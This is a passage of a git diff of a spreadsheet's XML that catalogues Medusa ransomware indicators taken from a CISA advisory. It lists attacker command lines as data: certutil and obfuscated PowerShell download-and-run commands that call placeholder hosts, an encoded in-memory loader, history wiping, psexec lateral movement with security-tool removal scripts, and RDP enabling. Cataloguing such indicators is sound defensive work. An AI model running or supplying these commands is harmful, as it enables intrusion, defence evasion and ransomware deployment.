-    </row>
-    <row r="58" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A58" s="1" t="s">
+      <c r="E58" s="1"/>
+      <c r="F58" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="59" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A59" s="1" t="s">
         <v>137</v>
       </c>
-      <c r="B58" s="1"/>
-      <c r="C58" s="1"/>
-      <c r="D58" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E58" s="1" t="s">
+      <c r="B59" s="1"/>
+      <c r="C59" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D59" s="1" t="s">
         <v>65</v>
       </c>
-      <c r="F58" s="1"/>
-      <c r="G58" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="59" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A59" s="1" t="s">
+      <c r="E59" s="1"/>
+      <c r="F59" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="60" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A60" s="1" t="s">
         <v>138</v>
       </c>
-      <c r="B59" s="1"/>
-      <c r="C59" s="1"/>
-      <c r="D59" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E59" s="1" t="s">
+      <c r="B60" s="1"/>
+      <c r="C60" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D60" s="1" t="s">
         <v>66</v>
       </c>
-      <c r="F59" s="1"/>
-      <c r="G59" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="60" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A60" s="1" t="s">
+      <c r="E60" s="1"/>
+      <c r="F60" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="61" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A61" s="1" t="s">
         <v>139</v>
       </c>
-      <c r="B60" s="1"/>
-      <c r="C60" s="1"/>
-      <c r="D60" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E60" s="1" t="s">
+      <c r="B61" s="1"/>
+      <c r="C61" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D61" s="1" t="s">
         <v>67</v>
       </c>
-      <c r="F60" s="1"/>
-      <c r="G60" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="61" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A61" s="1" t="s">
+      <c r="E61" s="1"/>
+      <c r="F61" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="62" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A62" s="1" t="s">
         <v>140</v>
       </c>
-      <c r="B61" s="1"/>
-      <c r="C61" s="1"/>
-      <c r="D61" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E61" s="1" t="s">
+      <c r="B62" s="1"/>
+      <c r="C62" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D62" s="1" t="s">
         <v>68</v>
       </c>
-      <c r="F61" s="1"/>
-      <c r="G61" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="62" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A62" s="1" t="s">
+      <c r="E62" s="1"/>
+      <c r="F62" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="63" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A63" s="1" t="s">
         <v>141</v>
       </c>
-      <c r="B62" s="1"/>
-      <c r="C62" s="1"/>
-      <c r="D62" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E62" s="1" t="s">
+      <c r="B63" s="1"/>
+      <c r="C63" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D63" s="1" t="s">
         <v>69</v>
       </c>
-      <c r="F62" s="1"/>
-      <c r="G62" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="63" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A63" s="1" t="s">
+      <c r="E63" s="1"/>
+      <c r="F63" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="64" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A64" s="1" t="s">
         <v>142</v>
       </c>
-      <c r="B63" s="1"/>
-      <c r="C63" s="1"/>
-      <c r="D63" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E63" s="1" t="s">
+      <c r="B64" s="1"/>
+      <c r="C64" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D64" s="1" t="s">
         <v>70</v>
       </c>
-      <c r="F63" s="1"/>
-      <c r="G63" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="64" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A64" s="1" t="s">
+      <c r="E64" s="1"/>
+      <c r="F64" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="65" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A65" s="1" t="s">
         <v>143</v>
       </c>
-      <c r="B64" s="1"/>
-      <c r="C64" s="1"/>
-      <c r="D64" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E64" s="1" t="s">
+      <c r="B65" s="1"/>
+      <c r="C65" s="1" t="s">
         <v>71</v>
       </c>
-      <c r="F64" s="1"/>
-      <c r="G64" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="65" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A65" s="1" t="s">
-        <v>144</v>
-      </c>
-      <c r="B65" s="1"/>
-      <c r="C65" s="1"/>
       <c r="D65" s="1" t="s">
         <v>72</v>
       </c>
-      <c r="E65" s="1" t="s">
+      <c r="E65" s="1"/>
+      <c r="F65" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="66" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A66" s="1" t="s">
+        <v>144</v>
+      </c>
+      <c r="B66" s="1"/>
+      <c r="C66" s="1" t="s">
+        <v>71</v>
+      </c>
+      <c r="D66" s="1" t="s">
         <v>73</v>
       </c>
-      <c r="F65" s="1"/>
-      <c r="G65" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="66" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A66" s="1" t="s">
+      <c r="E66" s="1"/>
+      <c r="F66" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="67" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A67" s="1" t="s">
         <v>145</v>
       </c>
-      <c r="B66" s="1"/>
-      <c r="C66" s="1"/>
-      <c r="D66" s="1" t="s">
-        <v>72</v>
-      </c>
-      <c r="E66" s="1" t="s">
+      <c r="B67" s="1"/>
+      <c r="C67" s="1" t="s">
+        <v>71</v>
+      </c>
+      <c r="D67" s="1" t="s">
         <v>74</v>
       </c>
-      <c r="F66" s="1"/>
-      <c r="G66" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="67" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A67" s="1" t="s">
+      <c r="E67" s="1"/>
+      <c r="F67" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="68" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A68" s="1" t="s">
         <v>146</v>
       </c>
-      <c r="B67" s="1"/>
-      <c r="C67" s="1"/>
-      <c r="D67" s="1" t="s">
-        <v>72</v>
-      </c>
-      <c r="E67" s="1" t="s">
+      <c r="B68" s="1"/>
+      <c r="C68" s="1" t="s">
+        <v>71</v>
+      </c>
+      <c r="D68" s="1" t="s">
         <v>75</v>
       </c>
-      <c r="F67" s="1"/>
-      <c r="G67" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="68" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A68" s="1" t="s">
+      <c r="E68" s="1"/>
+      <c r="F68" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="69" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A69" s="1" t="s">
         <v>147</v>
       </c>
-      <c r="B68" s="1"/>
-      <c r="C68" s="1"/>
-      <c r="D68" s="1" t="s">
-        <v>72</v>
-      </c>
-      <c r="E68" s="1" t="s">
+      <c r="B69" s="1"/>
+      <c r="C69" s="1" t="s">
+        <v>71</v>
+      </c>
+      <c r="D69" s="1" t="s">
         <v>76</v>
       </c>
-      <c r="F68" s="1"/>
-      <c r="G68" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="69" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A69" s="1" t="s">
+      <c r="E69" s="1"/>
+      <c r="F69" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="70" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A70" s="1" t="s">
         <v>148</v>
       </c>
-      <c r="B69" s="1"/>
-      <c r="C69" s="1"/>
-      <c r="D69" s="1" t="s">
-        <v>72</v>
-      </c>
-      <c r="E69" s="1" t="s">
+      <c r="B70" s="1"/>
+      <c r="C70" s="1" t="s">
+        <v>71</v>
+      </c>
+      <c r="D70" s="1" t="s">
         <v>77</v>
       </c>
-      <c r="F69" s="1"/>
-      <c r="G69" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="70" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A70" s="1" t="s">
+      <c r="E70" s="1"/>
+      <c r="F70" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="71" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A71" s="1" t="s">
         <v>149</v>
       </c>
-      <c r="B70" s="1"/>
-      <c r="C70" s="1"/>
-      <c r="D70" s="1" t="s">
-        <v>72</v>
-      </c>
-      <c r="E70" s="1" t="s">
+      <c r="B71" s="1"/>
+      <c r="C71" s="1" t="s">
         <v>78</v>
       </c>
-      <c r="F70" s="1"/>
-      <c r="G70" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="71" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A71" s="1" t="s">
-        <v>150</v>
-      </c>
-      <c r="B71" s="1"/>
-      <c r="C71" s="1"/>
       <c r="D71" s="1" t="s">
         <v>79</v>
       </c>
-      <c r="E71" s="1" t="s">
-        <v>80</v>
-      </c>
-      <c r="F71" s="1"/>
-      <c r="G71" s="1" t="s">
-        <v>9</v>
+      <c r="E71" s="1"/>
+      <c r="F71" s="1" t="s">
+        <v>8</v>
       </c>
     </row>
   </sheetData>

--- a/delta2/lib_e/osi_ransom/medusa.xlsx
+++ b/delta2/lib_e/osi_ransom/medusa.xlsx
@@ -8,14 +8,18 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{39D1AE5C-38EF-9B48-AD72-E43F3588CBE7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{CF7D2597-75F2-AD43-83CC-3BDD07F573F7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="100" yWindow="-21100" windowWidth="34560" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
+    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
   </sheets>
-  <calcPr calcId="181029"/>
+  <calcPr calcId="191029"/>
+  <pivotCaches>
+    <pivotCache cacheId="73" r:id="rId3"/>
+  </pivotCaches>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -36,7 +40,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="286" uniqueCount="150">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="340" uniqueCount="166">
   <si>
     <t>eid</t>
   </si>
@@ -54,9 +58,6 @@
   </si>
   <si>
     <t>eid_type</t>
-  </si>
-  <si>
-    <t>command_line</t>
   </si>
   <si>
     <t>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll</t>
@@ -265,9 +266,6 @@
     <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
   </si>
   <si>
-    <t>tool_used</t>
-  </si>
-  <si>
     <t xml:space="preserve">mimikatz </t>
   </si>
   <si>
@@ -286,9 +284,6 @@
     <t>Softperfect Netscan</t>
   </si>
   <si>
-    <t>scanning</t>
-  </si>
-  <si>
     <t>scanned ports 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389</t>
   </si>
   <si>
@@ -500,6 +495,63 @@
   </si>
   <si>
     <t>medusa-eid0070</t>
+  </si>
+  <si>
+    <t>cmdline</t>
+  </si>
+  <si>
+    <t>htool</t>
+  </si>
+  <si>
+    <t>netscan-pid</t>
+  </si>
+  <si>
+    <t>generic</t>
+  </si>
+  <si>
+    <t>netsh-pid</t>
+  </si>
+  <si>
+    <t>vss-pid</t>
+  </si>
+  <si>
+    <t>registry-pid</t>
+  </si>
+  <si>
+    <t>netclt-pid</t>
+  </si>
+  <si>
+    <t>nltest-pid</t>
+  </si>
+  <si>
+    <t>psexec-pid</t>
+  </si>
+  <si>
+    <t>pshell-pid</t>
+  </si>
+  <si>
+    <t>ipconfig-pid</t>
+  </si>
+  <si>
+    <t>certutil-pid</t>
+  </si>
+  <si>
+    <t>Row Labels</t>
+  </si>
+  <si>
+    <t>Grand Total</t>
+  </si>
+  <si>
+    <t>Count of map_pid</t>
+  </si>
+  <si>
+    <t>Count of eid_type</t>
+  </si>
+  <si>
+    <t>rclone-pid</t>
+  </si>
+  <si>
+    <t>mimikatz-pid</t>
   </si>
 </sst>
 </file>
@@ -541,11 +593,16 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="2">
+  <cellXfs count="5">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -585,16 +642,670 @@
 </styleSheet>
 </file>
 
+<file path=xl/pivotCache/pivotCacheDefinition1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotCacheDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" r:id="rId1" refreshedBy="Harvey Wargo" refreshedDate="45770.350139930553" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="70" xr:uid="{97DAC227-806D-CC43-9C4D-744C8CA2C2E2}">
+  <cacheSource type="worksheet">
+    <worksheetSource name="Table1"/>
+  </cacheSource>
+  <cacheFields count="6">
+    <cacheField name="eid" numFmtId="0">
+      <sharedItems/>
+    </cacheField>
+    <cacheField name="map_pid" numFmtId="0">
+      <sharedItems containsBlank="1"/>
+    </cacheField>
+    <cacheField name="eid_type" numFmtId="0">
+      <sharedItems/>
+    </cacheField>
+    <cacheField name="evidence" numFmtId="0">
+      <sharedItems longText="1"/>
+    </cacheField>
+    <cacheField name="description" numFmtId="0">
+      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
+    </cacheField>
+    <cacheField name="ns_meta" numFmtId="0">
+      <sharedItems count="1">
+        <s v="{ &quot;data&quot;: &quot;2025-03-25&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf&quot;, &quot;tags&quot;: [&quot;medusa&quot;]}"/>
+      </sharedItems>
+    </cacheField>
+  </cacheFields>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{725AE2AE-9491-48be-B2B4-4EB974FC3084}">
+      <x14:pivotCacheDefinition/>
+    </ext>
+  </extLst>
+</pivotCacheDefinition>
+</file>
+
+<file path=xl/pivotCache/pivotCacheRecords1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotCacheRecords xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" count="70">
+  <r>
+    <s v="medusa-eid0001"/>
+    <s v="certutil-pid"/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0002"/>
+    <s v="certutil-pid"/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.msi &lt;localfile&gt;.msi"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0003"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c driverquery"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0004"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c echo Computer: %COMPUTERNAME% &amp; `_x000a_echo Username: %USERNAME% &amp; `_x000a_echo Domain: %USERDOMAIN% &amp; `_x000a_echo Logon Server: %LOGONSERVER% &amp; `_x000a_echo DNS Domain: %USERDNSDOMAIN% &amp; `_x000a_echo User Profile: %USERPROFILE% &amp; echo `_x000a_System Root: %SYSTEMROOT%"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0005"/>
+    <s v="ipconfig-pid"/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c ipconfig /all"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0006"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c net share"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0007"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c net use"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0008"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c netstat -a"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0009"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c sc query"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0010"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c schtasks"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0011"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c systeminfo"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0012"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c ver"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0013"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0014"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="cmd.exe /c wmic printjob"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0015"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="mmc.exe compmgmt.msc /computer:{hostname/ip}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0016"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="mstsc.exe /v:{hostname/ip}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0017"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0018"/>
+    <s v="pshell-pid"/>
+    <s v="cmdline"/>
+    <s v="powershell -exec bypass -enc &lt;base64 encrypted command string&gt;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0019"/>
+    <s v="pshell-pid"/>
+    <s v="cmdline"/>
+    <s v="powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (NewObject Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RMM tool&gt;.msi)"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0020"/>
+    <s v="pshell-pid"/>
+    <s v="cmdline"/>
+    <s v="powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((_x000a_New-Object System.IO.StreamReader(_x000a_New-Object System.IO.Compression.GzipStream((_x000a_New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(_x000a_(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;',_x000a_'&lt;character replacement 1&gt;','&lt;character replacement 2&gt;')))),_x000a_[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0021"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="powershell Remove-Item (Get-PSReadlineOption).HistorySavePath"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0022"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="powershell Get-ADComputer -Filter * -Property * | Select-Object_x000a_Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path &lt;file path&gt;_x000a_-NoTypeInformation -Encoding UTF8"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0023"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} &quot;c:\windows\system32\taskkill.exe&quot; /f /im WRSA.exe"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0024"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0025"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0026"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0027"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0028"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0029"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0030"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;c:\gaze.exe&quot;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0031"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;copy \\ad02\sysvol\gaze.exe c:\gaze.exe"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0032"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c &quot;copy \\ad02\sysvol\gaze.exe c:\gaze.exe &amp;&amp; c:\gaze.exe&quot;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0033"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0034"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0035"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0036"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0037"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0038"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0039"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0040"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0041"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0042"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0043"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0044"/>
+    <s v="psexec-pid"/>
+    <s v="cmdline"/>
+    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0045"/>
+    <s v="nltest-pid"/>
+    <s v="cmdline"/>
+    <s v="nltest /dclist:"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0046"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
